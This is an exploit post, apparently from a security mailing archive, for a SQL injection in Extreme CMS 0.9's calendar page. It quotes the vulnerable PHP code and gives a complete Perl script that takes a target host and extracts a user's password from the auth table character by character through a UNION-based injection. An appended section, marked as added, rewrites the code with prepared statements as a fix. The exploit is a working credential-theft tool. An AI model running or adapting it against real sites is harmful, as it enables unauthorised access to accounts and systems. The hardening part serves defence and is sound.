
26.11.2009, 21:45
Extreme CMS 0.9 SQL Injection Exploit
Extreme CMS 0.9
SQL Injection
Vuln file: /calendar/show.php
PHP code:
... ... ... ... ...
$id = $_GET['event']; // from clicked day
$sho = $_GET['sho']; // display method
$query = "SELECT * FROM calendar WHERE id = '$id' "; // retrieves ONE record
$result = mysql_query($query);
$myrow = mysql_fetch_array($result);
$ev_1 = $myrow['ev_dat']; // is date for that record (allows multiple events selection)
$found = $myrow['ev_dat'];
$pieces = explode("-", $ev_1);
$monum = intval($pieces[1]);
$query = "SELECT * from calendar WHERE ev_dat = '$ev_1' "; // retrieves ALL date matches
$result = mysql_query($query);
echo"<table width='480' 'cellpadding='3' cellspacing='3' align='center' style='border: thin dotted #cccccc;' bgcolor='#f7f7f7'><tr><td>";
echo "<h2>". $mo[$monum]. " ". intval($pieces[2]). ", ". intval($pieces[0]). "</h2>";
... ... ... ... ...
There is no filtering of the incoming data at all. There is one "but"... the result of the SQL query is processed with intval.
To get around intval (if that can be called a bypass) and to simplify the output, I wrote an exploit.
Exploit:
Code:
#!/usr/bin/perl
#-----------------------------------------
# Extreme CMS 0.9 SQL Injection Exploit
#-----------------------------------------
# Download Script : http://sourceforge.net/projects/extremecms
#
# Author : RulleR aka Pin4eG
# Contact : rull3rrr[at]gmail[dot]com
# Visit : forum.antichat.ru
#-----------------------------------------
use LWP;
use Fcntl;
#________________ CONFIG _______________
$vuln = '/calendar/show.php?event=';
$length = 40;
$column_name = 'password';
$table_name = 'auth';
$id = 1; # user id
$regexp = '<h2> 0, (.*)<\/h2>';
$filename = 'Exp_result.txt';
#_______________________________________
$title = "
[*]==================================[*]
! !
! Extreme CMS SQL Injection Exploit !
! !
! Found && coded by RulleR !
! !
[*]==================================[*]
";
print $title;
print "\n[+] Enter Host: ";
chop ($host = <>);
print "\n[>] Exploiting started... $host\n";
for ($start = 1; $start<=$length; $start++) {
$inj = '-1%27+union+select+null,ord(substr((select+'.$column_name.'+from+'.$table_name.'+where+id='.$id.'),'.$start.',1)),null,null,null+--+';
$req = $host.$vuln.$inj;
$cont = &WebGet($req);
$cont =~ /$regexp/;
last if (!$1);
$char = chr($1);
push (@res, $char);
}
print "\n------------- [Result] --------------\n";
print @res;
print "\n-------------------------------------\n";
print "\n[!] Exploiting finished :)\n";
sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
print RESULT $title;
print RESULT "\n------------- [Result] --------------\n";
print RESULT @res;
print RESULT "\n-------------------------------------\n";
close (RESULT);
print "\nResult saving in $filename\n";
sub WebGet() {
$url = $_[0];
$request = HTTP::Request->new(GET => $url);
$u_a = LWP::UserAgent->new();
$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$u_a->timeout(5);
$response = $u_a->request($request);
if ($response->is_error) {
print " ! Error: ".$response->status_line.".\n"; die " :(\n";
}
return $response->content;
}
securityreason.com
Successful exploitation requires:
magic quotes = Off
© RulleR aka Pin4eG
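As an added example that is not part of the original post or of Extreme CMS itself, the following is a hardened rewrite of the show.php fragment quoted above: the event parameter is validated as an integer before it reaches SQL, and both queries use mysqli prepared statements with bound parameters, so the fix no longer depends on the magic_quotes setting at all. It assumes an existing mysqli connection in $db built on mysqlnd (needed for get_result()), the same calendar table columns (id, ev_dat) the original reads, and the $mo month-name array the original echoes; those names are taken from the snippet or assumed, not from the project's own fixed release.

```php
<?php
// Added example (not Extreme CMS code): hardened rewrite of the vulnerable
// fragment from /calendar/show.php. Assumes a mysqli connection $db (mysqlnd)
// and the $mo month-name array already exist, as in the original script.

function load_event_by_id(mysqli $db, $raw_id) {
    // The original interpolated $_GET['event'] directly into the query string.
    // The id is numeric by design, so reject anything that is not a positive
    // integer before building any SQL. This check is independent of magic_quotes.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Placeholder + bound parameter: the value can never change the query structure.
    $stmt = $db->prepare('SELECT * FROM calendar WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function load_events_by_date(mysqli $db, $ev_dat) {
    // Second query: the original re-interpolated ev_dat taken from the first row.
    // Even though that value came from the database, bind it rather than
    // concatenating it, so the query stays safe whatever the column contains.
    $stmt = $db->prepare('SELECT * FROM calendar WHERE ev_dat = ?');
    $stmt->bind_param('s', $ev_dat);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

$event = load_event_by_id($db, $_GET['event'] ?? '');
if ($event === null) {
    // Invalid or unknown id: fail closed instead of running a query on a NULL row.
    http_response_code(404);
    exit('Event not found');
}

$pieces = explode('-', $event['ev_dat']);   // YYYY-MM-DD, as in the original
$monum  = intval($pieces[1]);
$events = load_events_by_date($db, $event['ev_dat']);

// Escape anything echoed back into HTML; the original echoed values raw.
echo '<h2>' . htmlspecialchars($mo[$monum] ?? '', ENT_QUOTES, 'UTF-8') . ' '
   . intval($pieces[2]) . ', ' . intval($pieces[0]) . '</h2>';
```

The key change is that no request-controlled or database-sourced string is ever concatenated into SQL; the integer validation on the event parameter is defence in depth on top of the prepared statement, and the 404 branch removes the "0" in the heading that the original produced when the first query matched no row.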